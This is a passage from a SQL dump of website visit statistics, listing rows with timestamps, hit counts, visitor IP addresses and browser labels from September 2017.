78.166','chrome'),(152664,1504602056,1,1,0,0,'146.120.30.201','chrome'),(152665,1504602530,1,1,0,0,'164.132.162.159','other'),(152666,1504602607,1,1,0,0,'46.39.36.11','chrome'),(152667,1504602736,18,18,0,0,'208.110.93.52','other'),(152668,1504602880,1,1,0,0,'91.196.177.46','firefox'),(152669,1504603226,1,1,0,0,'217.182.132.193','other'),(152670,1504604239,1,1,0,0,'5.45.207.64','other'),(152671,1504604413,1,1,0,0,'51.255.65.5','other'),(152672,1504605056,1,1,0,0,'217.182.132.27','other'),(152673,1504605093,1,1,0,0,'51.255.65.31','other'),(152674,1504605152,1,1,0,0,'217.182.132.67','other'),(152675,1504606374,1,0,1,0,'66.249.64.29',''),(152676,1504606787,1,1,0,0,'51.255.65.97','other'),(152677,1504607086,1,1,0,0,'51.255.71.101','other'),(152678,1504607770,1,1,0,0,'51.255.65.30','other'),(152679,1504608207,1,1,0,0,'217.182.132.179','other'),(152680,1504608492,1,1,0,0,'164.132.162.160','other'),(152681,1504609448,1,1,0,0,'178.94.252.49','chrome'),(152682,1504609887,1,1,0,0,'141.8.183.1','other'),(152683,1504610251,1,1,0,0,'91.196.178.134','firefox'),(152684,1504610927,1,0,1,0,'66.249.64.29',''),(152685,1504610977,1,1,0,0,'51.255.71.116','other'),(152686,1504611001,1,1,0,0,'157.55.39.61','other'),(152687,1504611151,1,1,0,0,'178.94.252.49','chrome'),(152688,1504611298,1,1,0,0,'8.29.198.27','other'),(152689,1504611558,1,1,0,0,'217.69.133.5','other'),(152690,1504611970,1,1,0,0,'213.108.47.17','chrome'),(152691,1504612024,1,1,0,0,'91.196.178.66','chrome'),(152692,1504612188,1,1,0,0,'217.182.132.174','other'),(152693,1504612984,1,1,0,0,'217.182.132.36','other'),(152694,1504613016,1,1,0,0,'217.182.132.75','other'),(152695,1504613467,1,1,0,0,'66.249.64.30','chrome'),(152696,1504613676,1,1,0,0,'151.80.27.118','other'),(152697,1504613684,1,1,0,0,'51.255.71.133','other'),(152698,1504613726,2,2,0,0,'5.45.207.64','other'),(152699,1504613833,1,1,0,0,'141.8.183.1','other'),(152700,1504613855,1,1,0,0,'51.255.65.53','other'),(152701,1504614571,1,1,0,0,'217.182.132.175','other'),(152702,1504614811,2,2,0,0,'141.8.183.1','other'),(152703,1504615292,1,1,0,0,'137.74.201.100','other'),(152704,1504615373,1,1,0,0,'51.255.65.87','other'),(152705,1504615477,1,1,0,0,'217.182.132.185','other'),(152706,1504616058,1,1,0,0,'137.74.207.114','other'),(152707,1504616352,1,1,0,0,'5.45.207.64','other'),(152708,1504616436,1,1,0,0,'91.196.178.70','chrome'),(152709,1504616474,1,1,0,0,'217.182.132.22','other'),(152710,1504617468,1,1,0,0,'5.45.207.64','other'),(152711,1504617609,2,2,0,0,'141.8.183.1','other'),(152712,1504617899,1,1,0,0,'66.249.70.29','chrome'),(152713,1504618150,1,1,0,0,'162.210.196.98','other'),(152714,1504618206,1,1,0,0,'51.255.71.128','other'),(152715,1504618759,1,1,0,0,'51.255.65.64','other'),(152716,1504618895,1,0,1,0,'66.249.64.28',''),(152717,1504619174,3,3,0,0,'5.45.207.64','other'),(152718,1504619503,2,2,0,0,'141.8.183.1','other'),(152719,1504619518,1,1,0,0,'141.8.142.21','other'),(152720,1504619895,1,1,0,0,'217.182.132.4','other'),(152721,1504619956,1,1,0,0,'157.55.39.61','other'),(152722,1504620001,1,1,0,0,'91.196.177.46','chrome'),(152723,1504620157,1,1,0,0,'51.255.65.38','other'),(152724,1504620728,1,1,0,0,'51.255.65.25','other'),(152725,1504620864,1,1,0,0,'217.182.132.192','other'),(152726,1504620983,1,1,0,0,'51.255.65.69','other'),(152727,1504621595,1,1,0,0,'141.8.183.1','other'),(152728,1504621787,2,2,0,0,'40.77.167.86','other'),(152729,1504622125,1,1,0,0,'8.29.198.27','other'),(152730,1504622179,1,1,0,0,'51.255.65.90','other'),(152731,1504622210,1,1,0,0,'46.229.168.75','other'),(152732,1504622228,1,1,0,0,'46.229.168.71','other'),(152733,1504622262,5,5,0,0,'46.229.168.78','other'),(152734,1504622264,1,1,0,0,'46.229.168.68','other'),(152735,1504622281,1,0,1,0,'66.249.70.25',''),(152736,1504622294,1,1,0,0,'66.249.70.27','chrome'),(152737,1504622303,1,1,0,0,'46.229.168.77','other'),(152738,1504622336,6,6,0,0,'46.229.168.66','other'),(152739,1504622354,2,2,0,0,'46.229.168.67','other'),(152740,1504622367,1,1,0,0,'213.180.203.32','other'),(152741,1504622392,1,1,0,0,'46.229.168.72','other'),(152742,1504622408,1,1,0,0,'46.229.168.79','other'),(152743,1504622411,2,2,0,0,'46.229.168.70','other'),(152744,1504622426,2,2,0,0,'46.229.168.65','other'),(152746,1504622879,1,1,0,0,'217.182.132.155','other'),(152747,1504623156,1,1,0,0,'5.45.207.64','other'),(152748,1504623247,1,1,0,0,'51.255.65.70','other'),(152749,1504623312,1,1,0,0,'141.8.183.1','other'),(152750,1504623356,1,1,0,0,'66.102.9.25','chrome'),(152751,1504623621,1,1,0,0,'217.182.132.95','other'),(152752,1504623735,1,1,0,0,'141.8.142.21','other'),(152753,1504623833,1,0,1,0,'66.249.64.29',''),(152754,1504623967,1,1,0,0,'51.255.71.118','other'),(152755,1504624329,1,1,0,0,'141.8.183.1','other'),(152756,1504624380,1,1,0,0,'51.255.65.39','other'),(152757,1504624421,1,1,0,0,'217.182.132.73','other'),(152758,1504624423,1,1,0,0,'217.182.132.4','other'),(152759,1504625125,1,1,0,0,'91.196.178.38','chrome'),(152760,1504625787,2,2,0,0,'141.8.183.1','other'),(152761,1504626254,1,1,0,0,'91.196.178.163','chrome'),(152762,1504626336,1,1,0,0,'51.255.65.59','other'),(152763,1504626785,1,1,0,0,'51.255.65.48','other'),(152764,1504626987,1,1,0,0,'141.8.142.21','other'),(152765,1504627004,1,1,0,0,'217.182.132.65','other'),(152766,1504627225,1,1,0,0,'137.74.207.116','other'),(152767,1504627283,1,1,0,0,'51.255.71.101','other'),(152768,1504627529,1,1,0,0,'164.132.162.156','other'),(152769,1504628103,1,0,1,0,'66.249.64.28',''),(152770,1504628640,1,1,0,0,'5.45.207.64','other'),(152771,1504629650,1,1,0,0,'217.182.132.16','other'),(152772,1504629988,1,1,0,0,'107.167.106.28','other'),(152773,1504630316,4,4,0,0,'141.8.183.1','other'),(152774,1504630377,1,1,0,0,'51.255.65.58','other'),(152775,1504630403,1,1,0,0,'51.255.71.126','other'),(152776,1504630596,1,1,0,0,'188.163.11.185','chrome'),(152777,1504630821,2,2,0,0,'5.45.207.64','other'),(152778,1504631367,1,1,0,0,'180.76.15.6','other'),(152779,1504631436,1,1,0,0,'37.54.22.131','chrome'),(152780,1504631571,1,1,0,0,'173.252.85.213','other'),(152781,1504631908,2,2,0,0,'5.45.207.64','other'),(152782,1504632134,2,2,0,0,'141.8.183.1','other'),(152783,1504632607,1,1,0,0,'163.172.255.139','chrome'),(152784,1504632856,1,1,0,0,'217.182.132.240','other'),(152785,1504632945,1,1,0,0,'8.29.198.26','other'),(152786,1504632959,1,1,0,0,'217.182.132.16','other'),(152787,1504633154,1,1,0,0,'217.182.132.154','other'),(152788,1504633264,1,1,0,0,'66.249.64.28','chrome'),(152789,1504633423,1,1,0,0,'217.182.132.87','other'),(152790,1504633576,1,1,0,0,'51.255.65.70','other'),(152791,1504633827,1,1,0,0,'141.8.142.21','other'),(152792,1504634132,1,1,0,0,'37.73.236.171','chrome'),(152793,1504634509,1,1,0,0,'5.45.207.64','other'),(152794,1504634652,1,1,0,0,'217.182.132.177','other'),(152795,1504635451,1,1,0,0,'217.182.132.4','other'),(152796,1504635798,1,1,0,0,'178.92.251.18','chrome'),(152797,1504636038,1,1,0,0,'141.8.183.1','other'),(152798,1504636291,1,1,0,0,'91.196.178.40','chrome'),(152799,1504636948,1,1,0,0,'5.45.207.32','other'),(152800,1504636975,2,2,0,0,'141.8.183.1','other'),(152801,1504637015,1,1,0,0,'141.8.142.21','other'),(152802,1504637019,2,2,0,0,'5.45.207.64','other'),(152803,1504637026,1,1,0,0,'217.182.132.90','other'),(152804,1504637989,1,1,0,0,'5.45.207.64','other'),(152805,1504638182,1,1,0,0,'51.255.65.11','other'),(152806,1504638586,1,1,0,0,'157.55.39.211','other'),(152807,1504638793,1,0,1,0,'66.249.64.29',''),(152808,1504638799,1,0,1,0,'66.249.70.25',''),(152809,1504638801,1,1,0,0,'66.249.70.27','chrome'),(152810,1504639551,1,1,0,0,'51.255.65.34','other'),(152811,1504639820,1,1,0,0,'217.182.132.178','other'),(152812,1504639821,2,2,0,0,'141.8.183.1','other'),(152813,1504640158,1,1,0,0,'5.45.207.32','other'),(152814,1504640274,1,1,0,0,'51.255.71.118','other'),(152815,1504640294,1,0,1,0,'66.249.70.29',''),(152816,1504640333,1,1,0,0,'91.196.178.40','chrome'),(152817,1504640710,1,1,0,0,'46.211.144.158','chrome'),(152818,1504640797,1,1,0,0,'217.182.132.92','other'),(152819,1504641287,1,1,0,0,'91.196.178.67','firefox'),(152820,1504641368,1,1,0,0,'137.74.207.114','other'),(152821,1504641504,1,1,0,0,'217.182.132.4','other'),(152822,1504641617,1,1,0,0,'157.55.39.42','other'),(152823,1504641649,1,1,0,0,'66.249.64.28','chrome'),(152824,1504641784,1,1,0,0,'91.196.178.66','chrome'),(152825,1504642020,1,1,0,0,'91.209.11.236','other'),(152826,1504642131,1,1,0,0,'51.255.65.43','other'),(152827,1504642157,1,1,0,0,'54.208.102.37','other'),(152828,1504642242,1,1,0,0,'157.55.39.211','other'),(152829,1504643134,1,1,0,0,'141.8.183.1','other'),(152830,1504643268,1,1,0,0,'91.196.178.38','chrome'),(152831,1504643375,1,1,0,0,'217.182.132.156','other'),(152832,1504643761,1,1,0,0,'8.29.198.26','other'),(152833,1504643948,1,1,0,0,'157.55.39.211','other'),(152834,1504644141,1,1,0,0,'178.92.8.57','other'),(152835,1504644227,1,1,0,0,'91.196.103.169','chrome'),(152836,1504644548,1,1,0,0,'137.74.207.120','other'),(152837,1504644665,1,1,0,0,'51.255.65.11','other'),(152838,1504645003,1,1,0,0,'78.111.189.111','chrome'),(152839,1504645039,1,1,0,0,'141.8.142.21','other'),(152840,1504645431,1,1,0,0,'157.55.39.42','other'),(152841,1504645560,1,1,0,0,'51.255.65.20','other'),(152842,1504645636,1,1,0,0,'66.249.66.75','chrome'),(152843,1504645751,1,1,0,0,'51.255.71.128','other'),(152844,1504645907,1,1,0,0,'217.182.132.35','other'),(152845,1504645973,1,1,0,0,'51.255.65.73','other'),(152846,1504646076,1,1,0,0,'162.210.196.98','other'),(152847,1504646580,1,1,0,0,'66.249.66.155','chrome'),(152848,1504646725,1,1,0,0,'157.55.39.211','other'),(152849,1504648532,1,1,0,0,'141.8.183.1','other'),(152850,1504648721,1,1,0,0,'178.159.37.105','chrome'),(152851,1504649830,1,1,0,0,'66.249.66.75','chrome'),(152852,1504650077,1,1,0,0,'5.45.207.64','other'),(152853,1504651055,1,0,1,0,'66.249.76.107',''),(152854,1504651161,1,1,0,0,'66.249.76.108','chrome'),(152855,1504651217,1,1,0,0,'66.249.66.80','chrome'),(152856,1504651255,2,2,0,0,'91.209.11.236','other'),(152857,1504651407,1,1,0,0,'51.255.65.86','other'),(152858,1504651787,1,1,0,0,'217.182.132.82','other'),(152859,1504651971,1,1,0,0,'51.255.65.10','other'),(152860,1504652396,1,0,1,0,'66.249.76.69',''),(152861,1504652512,1,1,0,0,'176.31.231.10','other'),(152862,1504652581,1,1,0,0,'163.172.255.139','chrome'),(152863,1504652995,1,0,1,0,'66.249.76.109',''),(152864,1504653849,1,1,0,0,'217.182.132.31','other'),(152865,1504654583,1,1,0,0,'8.29.198.26','other'),(152866,1504655285,1,1,0,0,'51.255.65.90','other'),(152867,1504655375,1,1,0,0,'51.255.65.22','other'),(152868,1504655923,1,1,0,0,'178.140.118.68','msie'),(152869,1504656414,1,1,0,0,'217.182.132.97','other'),(152870,1504656523,1,1,0,0,'66.249.66.157','chrome'),(152871,1504656536,1,1,0,0,'66.249.66.75','chrome'),(152872,1504656588,1,1,0,0,'217.182.132.188','other'),(152873,1504656680,1,1,0,0,'40.77.167.86','other'),(152874,1504657329,1,1,0,0,'217.182.132.186','other'),(152875,1504657514,1,1,0,0,'137.74.207.101','other'),(152876,1504658314,1,1,0,0,'141.8.183.1','other'),(152877,1504658396,1,1,0,0,'51.255.65.39','other'),(152878,1504658653,1,1,0,0,'51.255.65.12','other'),(152879,1504658933,2,2,0,0,'91.209.11.236','other'),(152880,1504659723,1,1,0,0,'217.182.132.175','other'),(152881,1504660012,1,1,0,0,'51.255.65.91','other'),(152882,1504660415,1,1,0,0,'37.9.113.138','other'),(152883,1504660558,1,1,0,0,'217.182.132.172','other'),(152884,1504661196,1,1,0,0,'164.132.164.180','other'),(152885,1504661585,1,1,0,0,'66.249.76.109','chrome'),(152886,1504661610,1,1,0,0,'66.249.76.91','chrome'),(152887,1504661711,1,1,0,0,'51.255.65.67','other'),(152888,1504662128,1,1,0,0,'51.255.65.37','other'),(152889,1504662166,1,1,0,0,'217.182.132.50','other'),(152890,1504662703,1,1,0,0,'141.8.183.1','other'),(152891,1504663280,1,0,1,0,'66.249.66.156',''),(152892,1504663394,4,4,0,0,'5.45.207.64','other'),(152893,1504663813,1,1,0,0,'51.255.65.66','other'),(152894,1504664194,1,0,1,0,'66.249.76.109',''),(152895,1504664756,2,0,2,0,'66.249.76.108',''),(152896,1504664806,1,1,0,0,'141.8.183.1','other'),(152897,1504665216,1,0,1,0,'66.249.76.91',''),(152898,1504665318,1,1,0,0,'51.255.65.31','other'),(152899,1504665411,1,1,0,0,'8.29.198.26','other'),(152900,1504665622,1,1,0,0,'66.249.76.109','chrome'),(152901,1504665637,1,1,0,0,'66.249.76.89','chrome'),(152902,1504666424,1,1,0,0,'217.182.132.6','other'),(152903,1504666481,1,1,0,0,'51.255.71.121','other'),(152904,1504666557,1,1,0,0,'162.247.72.201','other'),(152905,1504666567,1,1,0,0,'195.22.126.177','chrome'),(152906,1504667043,1,1,0,0,'51.255.65.62','other'),(152907,1504667494,2,2,0,0,'91.209.11.236','other'),(152908,1504667829,1,1,0,0,'217.182.132.82','other'),(152909,1504668474,2,2,0,0,'91.209.11.236','other'),(152910,1504668646,1,1,0,0,'217.182.132.90','other'),(152911,1504669384,1,0,1,0,'66.249.66.76',''),(152912,1504669887,1,1,0,0,'91.209.11.236','other'),(152913,1504670304,1,1,0,0,'157.55.39.211','other'),(152914,1504670479,1,1,0,0,'66.249.76.108','chrome'),(152915,1504670494,1,1,0,0,'66.249.76.89','chrome'),(152916,1504670519,2,0,2,0,'66.249.66.155',''),(152917,1504670721,1,1,0,0,'51.255.65.7','other'),(152918,1504671168,1,1,0,0,'51.255.65.34','other'),(152919,1504671281,1,1,0,0,'51.255.65.51','other'),(152920,1504671307,1,1,0,0,'51.255.65.24','other'),(152921,1504671582,1,0,1,0,'66.249.76.108',''),(152922,1504671798,1,1,0,0,'51.255.65.96','other'),(152923,1504671872,1,0,1,0,'66.249.76.93',''),(152924,1504672360,1,1,0,0,'141.8.183.1','other'),(152925,1504672710,1,1,0,0,'5.45.207.64','other'),(152926,1504672973,1,1,0,0,'217.182.132.95','other'),(152927,1504673165,1,1,0,0,'217.182.132.148','other'),(152928,1504674190,1,0,1,0,'66.249.76.93',''),(152929,1504674276,1,1,0,0,'51.255.65.72','other'),(152930,1504674304,1,1,0,0,'51.255.65.48','other'),(152931,1504674376,1,1,0,0,'137.74.207.170','other'),(152932,1504674436,1,1,0,0,'217.182.132.68','other'),(152933,1504674548,1,1,0,0,'157.55.39.211','other'),(152934,1504674754,1,1,0,0,'51.255.65.32','other'),(152935,1504675239,2,2,0,0,'91.209.11.236','other'),(152936,1504675417,1,1,0,0,'51.255.65.75','other'),(152937,1504675629,1,1,0,0,'217.182.132.37','other'),(152938,1504675936,1,0,1,0,'66.249.66.74',''),(152939,1504676095,1,1,0,0,'91.196.178.71','chrome'),(152940,1504676236,1,1,0,0,'8.29.198.27','other'),(152941,1504676412,1,1,0,0,'217.182.132.22','other'),(152942,1504676884,2,2,0,0,'91.209.11.236','other'),(152943,1504677033,1,0,1,0,'66.249.76.108',''),(152944,1504677098,1,1,0,0,'137.74.207.116','other'),(152945,1504677353,1,1,0,0,'66.249.66.155','chrome'),(152946,1504677363,1,1,0,0,'66.249.66.75','chrome'),(152947,1504677585,2,2,0,0,'157.55.39.211','other'),(152948,1504677627,1,1,0,0,'31.13.113.173','other'),(152949,1504677628,1,1,0,0,'89.21.72.234','chrome'),(152950,1504677691,1,1,0,0,'91.196.177.46','chrome'),(152951,1504678002,1,1,0,0,'217.182.132.57','other'),(152952,1504678026,1,1,0,0,'40.77.167.86','other'),(152953,1504678348,1,1,0,0,'93.171.245.140','chrome'),(152954,1504678632,1,1,0,0,'217.182.132.151','other'),(152955,1504678855,1,1,0,0,'91.196.177.15','chrome'),(152956,1504679477,1,1,0,0,'217.182.132.187','other'),(152957,1504679531,1,1,0,0,'217.182.132.34','other'),(152958,1504680086,1,1,0,0,'51.255.65.60','other'),(152959,1504680346,1,1,0,0,'178.92.171.55','chrome'),(152960,1504680353,1,0,1,0,'66.249.76.108',''),(152961,1504680389,2,2,0,0,'141.8.183.1','other'),(152962,1504680399,1,1,0,0,'217.182.132.7','other'),(152963,1504680590,1,1,0,0,'5.45.207.64','other'),(152964,1504680678,1,1,0,0,'178.92.249.169','chrome'),(152965,1504680878,1,1,0,0,'91.196.178.65','chrome'),(152966,1504680987,1,1,0,0,'217.182.132.25','other'),(152967,1504681393,1,1,0,0,'46.219.33.141','chrome'),(152968,1504681630,2,2,0,0,'91.196.178.69','firefox'),(152969,1504681891,1,1,0,0,'217.182.132.60','other'),(152970,1504681964,1,1,0,0,'66.249.76.107','chrome'),(152971,1504681968,1,1,0,0,'66.249.76.93','chrome'),(152972,1504682409,1,1,0,0,'51.255.65.25','other'),(152973,1504683315,1,1,0,0,'217.182.132.96','other'),(152974,1504683513,1,1,0,0,'217.182.132.179','other'),(152975,1504683585,1,1,0,0,'91.196.178.36','chrome'),(152976,1504683691,1,0,1,0,'66.249.76.89',''),(152977,1504683926,1,1,0,0,'51.255.65.8','other'),(152978,1504684306,2,2,0,0,'164.132.162.160','other'),(152979,1504684393,1,0,1,0,'66.249.76.107',''),(152980,1504684412,1,1,0,0,'37.73.206.184','chrome'),(152981,1504684602,1,1,0,0,'51.255.65.90','other'),(152982,1504684837,1,0,1,0,'66.249.76.89',''),(152983,1504685158,1,1,0,0,'92.112.226.227','firefox'),(152984,1504685804,25,25,0,0,'173.234.159.250','other'),(152985,1504686383,1,1,0,0,'37.53.228.210','chrome'),(152986,1504686458,2,0,2,0,'66.249.76.91',''),(152987,1504686591,1,1,0,0,'51.255.65.31','other'),(152988,1504686712,1,1,0,0,'85.203.7.35','chrome'),(152989,1504686745,1,1,0,0,'141.8.183.19','other'),(152990,1504686749,1,1,0,0,'141.8.142.25','other'),(152991,1504686927,1,1,0,0,'66.249.76.109','chrome'),(152992,1504686960,1,1,0,0,'66.249.76.89','chrome'),(152993,1504687060,1,1,0,0,'8.29.198.26','other'),(152994,1504687079,1,0,1,0,'66.249.66.75',''),(152995,1504687089,1,1,0,0,'178.94.172.243','firefox'),(152996,1504687400,1,1,0,0,'46.133.162.155','chrome'),(152997,1504687920,4,4,0,0,'192.151.145.82','other'),(152998,1504688027,1,1,0,0,'51.255.65.19','other'),(152999,1504688171,1,1,0,0,'51.255.71.121','other'),(153000,1504688593,1,1,0,0,'93.74.212.147','firefox'),(153001,1504689791,1,1,0,0,'51.255.65.45','other'),(153002,1504690001,1,1,0,0,'217.182.132.71','other'),(153003,1504690564,1,1,0,0,'137.74.207.159','other'),(153004,1504691208,1,0,1,0,'66.249.76.109',''),(153005,1504691325,1,0,1,0,'66.249.66.157',''),(153006,1504691764,1,1,0,0,'91.196.178.71','chrome'),(153007,1504691807,1,1,0,0,'51.255.65.79','other'),(153008,1504692034,1,1,0,0,'91.209.11.236','other'),(153009,1504692177,1,1,0,0,'217.182.132.157','other'),(153010,1504692636,1,1,0,0,'66.249.66.156','chrome'),(153011,1504692655,1,1,0,0,'66.249.66.75','chrome'),(153012,1504692662,1,1,0,0,'137.74.207.119','other'),(153013,1504692909,1,1,0,0,'51.255.65.93','other'),(153014,1504696059,2,2,0,0,'178.251.108.137','chrome'),(153015,1504696311,1,1,0,0,'164.132.162.187','other'),(153016,1504696562,1,1,0,0,'51.255.65.93','other'),(153017,1504696653,1,1,0,0,'217.182.132.20','other'),(153018,1504696984,1,1,0,0,'137.74.207.114','other'),(153019,1504697019,1,0,1,0,'66.249.76.93',''),(153020,1504697090,1,0,1,0,'66.249.76.108',''),(153021,1504697127,1,1,0,0,'46.133.212.175','chrome'),(153022,1504697257,1,1,0,0,'91.196.178.66','firefox'),(153023,1504697756,1,1,0,0,'217.182.132.29','other'),(153024,1504697883,1,1,0,0,'8.29.198.27','other'),(153025,1504697940,1,1,0,0,'217.182.132.192','other'),(153026,1504697998,1,1,0,0,'66.249.66.155','chrome'),(153027,1504698017,1,1,0,0,'66.249.66.76','chrome'),(153028,1504698328,1,0,1,0,'66.249.76.107',''),(153029,1504698349,1,1,0,0,'217.182.132.149','other'),(153030,1504699201,1,1,0,0,'91.196.178.167','chrome'),(153031,1504699307,1,1,0,0,'37.53.242.33','chrome'),(153032,1504699493,1,1,0,0,'217.182.132.15','other'),(153033,1504699713,2,2,0,0,'199.58.86.209','other'),(153034,1504699840,1,1,0,0,'216.244.66.237','other'),(153035,1504700160,1,1,0,0,'217.182.132.28','other'),(153036,1504700298,1,1,0,0,'91.196.178.167','chrome'),(153037,1504700943,1,1,0,0,'217.182.132.27','other'),(153038,1504701062,1,1,0,0,'217.182.132.170','other'),(153039,1504701147,1,1,0,0,'78.111.187.97','chrome'),(153040,1504701311,1,1,0,0,'51.255.65.52','other'),(153041,1504701564,1,0,1,0,'66.249.66.74',''),(153042,1504701654,1,1,0,0,'185.137.18.122','chrome'),(153043,1504701774,1,1,0,0,'51.255.65.13','other'),(153044,1504701910,1,1,0,0,'5.45.207.64','other'),(153045,1504701914,1,1,0,0,'5.255.253.2','other'),(153046,1504701940,1,1,0,0,'91.196.178.167','chrome'),(153047,1504702322,1,1,0,0,'217.182.132.95','other'),(153048,1504702381,1,0,1,0,'66.249.76.89',''),(153049,1504703175,1,1,0,0,'137.74.207.102','other'),(153050,1504703536,1,1,0,0,'51.255.65.65','other'),(153051,1504703686,1,1,0,0,'51.255.65.61','other'),(153052,1504703712,1,1,0,0,'66.249.76.108','chrome'),(153053,1504703726,1,1,0,0,'66.249.76.89','chrome'),(153054,1504704378,1,1,0,0,'180.76.15.142','other'),(153055,1504704638,1,1,0,0,'91.124.154.203','chrome'),(153056,1504705086,1,0,1,0,'66.249.66.156',''),(153057,1504705624,1,1,0,0,'217.182.132.149','other'),(153058,1504705790,1,1,0,0,'81.1.242.33','other'),(153059,1504706407,1,0,1,0,'66.249.76.107',''),(153060,1504706432,1,1,0,0,'217.182.132.19','other'),(153061,1504707226,1,1,0,0,'91.209.11.236','other'),(153062,1504707598,1,1,0,0,'217.182.132.82','other'),(153063,1504708107,1,1,0,0,'5.45.207.64','other'),(153064,1504708595,2,2,0,0,'91.209.11.236','other'),(153065,1504708711,1,1,0,0,'8.29.198.26','other'),(153066,1504708878,1,1,0,0,'66.249.76.108','chrome'),(153067,1504708902,1,1,0,0,'66.249.76.93','chrome'),(153068,1504709038,1,1,0,0,'51.255.65.21','other'),(153069,1504709046,1,1,0,0,'217.182.132.82','other'),(153070,1504709362,1,1,0,0,'217.182.132.193','other'),(153071,1504709720,1,0,1,0,'66.249.76.89',''),(153072,1504710361,3,2,1,0,'66.249.76.108',''),(153073,1504710551,1,1,0,0,'51.255.65.73','other'),(153074,1504710655,1,1,0,0,'5.45.207.64','other'),(153075,1504710703,1,1,0,0,'109.63.201.50','chrome'),(153076,1504711628,1,0,1,0,'66.249.76.108',''),(153077,1504711751,1,1,0,0,'217.182.132.150','other'),(153078,1504712446,1,1,0,0,'66.249.76.109','chrome'),(153079,1504712742,1,1,0,0,'217.182.132.172','other'),(153080,1504713426,1,1,0,0,'51.255.71.125','other'),(153081,1504713818,1,0,1,0,'66.249.76.89',''),(153082,1504713995,1,0,1,0,'66.249.76.93',''),(153083,1504714710,1,1,0,0,'217.182.132.86','other'),(153084,1504717673,1,0,1,0,'66.249.76.109',''),(153085,1504718004,1,0,1,0,'66.249.76.93',''),(153086,1504718625,1,1,0,0,'51.255.65.22','other'),(153087,1504719114,1,0,1,0,'66.249.66.157',''),(153088,1504719141,1,0,1,0,'66.249.76.93',''),(153089,1504719188,1,1,0,0,'51.255.65.42','other'),(153090,1504719273,1,1,0,0,'91.196.178.36','firefox'),(153091,1504719544,1,1,0,0,'8.29.198.27','other'),(153092,1504719686,1,1,0,0,'217.182.132.188','other'),(153093,1504719751,1,1,0,0,'91.209.11.236','other'),(153094,1504720131,1,0,1,0,'66.249.76.108',''),(153095,1504720171,1,1,0,0,'91.196.178.40','chrome'),(153096,1504720257,1,1,0,0,'51.255.71.128','other'),(153097,1504720339,1,1,0,0,'212.86.229.33','chrome'),(153098,1504720492,1,1,0,0,'51.255.65.31','other'),(153099,1504721143,1,1,0,0,'51.255.65.59','other'),(153100,1504721309,2,2,0,0,'91.209.11.236','other'),(153101,1504721338,1,1,0,0,'51.255.65.60','other'),(153102,1504721465,1,1,0,0,'141.8.183.1','other'),(153103,1504721810,1,1,0,0,'151.80.27.116','other'),(153104,1504722362,1,1,0,0,'94.178.7.108','chrome'),(153105,1504722440,1,1,0,0,'217.182.132.76','other'),(153106,1504722695,2,2,0,0,'91.209.11.236','other'),(153107,1504723186,1,1,0,0,'51.255.71.113','other'),(153108,1504723282,1,1,0,0,'5.45.207.64','other'),(153109,1504723679,1,1,0,0,'51.255.65.19','other'),(153110,1504723972,1,0,1,0,'66.249.76.109',''),(153111,1504724590,1,1,0,0,'185.137.18.40','chrome'),(153112,1504724765,1,0,1,0,'66.249.66.74',''),(153113,1504725033,1,1,0,0,'51.255.71.111','other'),(153114,1504725214,1,1,0,0,'217.182.132.75','other'),(153115,1504725319,1,0,1,0,'66.249.76.107',''),(153116,1504725568,1,1,0,0,'217.182.132.87','other'),(153117,1504725748,1,0,1,0,'66.249.66.156',''),(153118,1504726990,1,1,0,0,'91.196.178.131','chrome'),(153119,1504727155,2,0,2,0,'66.249.76.109',''),(153120,1504729490,1,0,1,0,'66.249.66.75',''),(153121,1504730320,1,1,0,0,'141.8.183.1','other'),(153122,1504730375,1,1,0,0,'8.29.198.26','other'),(153123,1504730838,1,1,0,0,'173.208.157.186','other'),(153124,1504732078,1,1,0,0,'69.30.198.202','other'),(153125,1504733341,1,1,0,0,'66.249.76.93','chrome'),(153126,1504733465,1,1,0,0,'91.196.178.162','chrome'),(153127,1504734589,1,0,1,0,'66.249.76.107',''),(153128,1504734691,2,2,0,0,'5.45.207.64','other'),(153129,1504734808,1,1,0,0,'91.209.11.236','other'),(153130,1504735478,1,1,0,0,'34.224.71.209','other'),(153131,1504735698,1,1,0,0,'40.77.167.86','other'),(153132,1504736137,2,2,0,0,'93.74.164.216','chrome'),(153133,1504736611,1,0,1,0,'66.249.66.74',''),(153134,1504736731,1,1,0,0,'66.249.76.93','chrome'),(153135,1504736741,1,1,0,0,'66.249.76.108','chrome'),(153136,1504736927,1,1,0,0,'5.45.207.64','other'),(153137,1504737905,2,2,0,0,'91.209.11.236','other'),(153138,1504739192,1,1,0,0,'91.209.11.236','other'),(153139,1504739759,1,1,0,0,'217.69.133.194','other'),(153140,1504741204,1,1,0,0,'8.29.198.27','other'),(153141,1504741404,2,2,0,0,'91.209.11.236','other'),(153142,1504742631,1,1,0,0,'217.69.133.6','other'),(153143,1504742788,1,1,0,0,'217.182.132.62','other'),(153144,1504743562,1,1,0,0,'51.255.65.47','other'),(153145,1504743566,1,1,0,0,'91.209.11.236','other'),(153146,1504743870,1,0,1,0,'66.249.76.89',''),(153147,1504744166,1,1,0,0,'217.182.132.56','other'),(153148,1504744397,1,1,0,0,'141.8.183.1','other'),(153149,1504744646,1,1,0,0,'217.182.132.87','other'),(153150,1504744653,1,1,0,0,'51.255.71.130','other'),(153151,1504744681,1,1,0,0,'91.209.11.236','other'),(153152,1504745129,1,0,1,0,'66.249.66.75',''),(153153,1504745132,1,1,0,0,'66.249.66.155','chrome'),(153154,1504745134,1,1,0,0,'66.249.76.89','chrome'),(153155,1504745813,1,1,0,0,'217.182.132.155','other'),(153156,1504745973,1,1,0,0,'51.255.65.80','other'),(153157,1504746563,1,1,0,0,'45.55.243.174','other'),(153158,1504746613,1,1,0,0,'157.55.39.211','other'),(153159,1504746854,1,1,0,0,'141.8.142.21','other'),(153160,1504748780,1,1,0,0,'164.132.162.156','other'),(153161,1504749221,1,1,0,0,'51.255.71.120','other'),(153162,1504749412,1,1,0,0,'51.255.65.48','other'),(153163,1504749429,1,0,1,0,'66.249.66.155',''),(153164,1504749529,1,0,1,0,'66.249.76.93',''),(153165,1504749539,1,1,0,0,'81.1.242.33','other'),(153166,1504749630,3,3,0,0,'142.4.200.37','other'),(153167,1504749666,1,1,0,0,'137.74.207.170','other'),(153168,1504749743,1,1,0,0,'217.182.132.23','other'),(153169,1504749879,1,1,0,0,'109.173.52.218','msie'),(153170,1504749880,1,1,0,0,'5.228.20.248','msie'),(153171,1504750586,1,1,0,0,'217.182.132.77','other'),(153172,1504750806,1,1,0,0,'51.255.65.12','other'),(153173,1504750847,1,1,0,0,'217.182.132.4','other'),(153174,1504750858,1,1,0,0,'66.249.76.93','chrome'),(153175,1504751710,1,1,0,0,'51.255.65.81','other'),(153176,1504751811,1,1,0,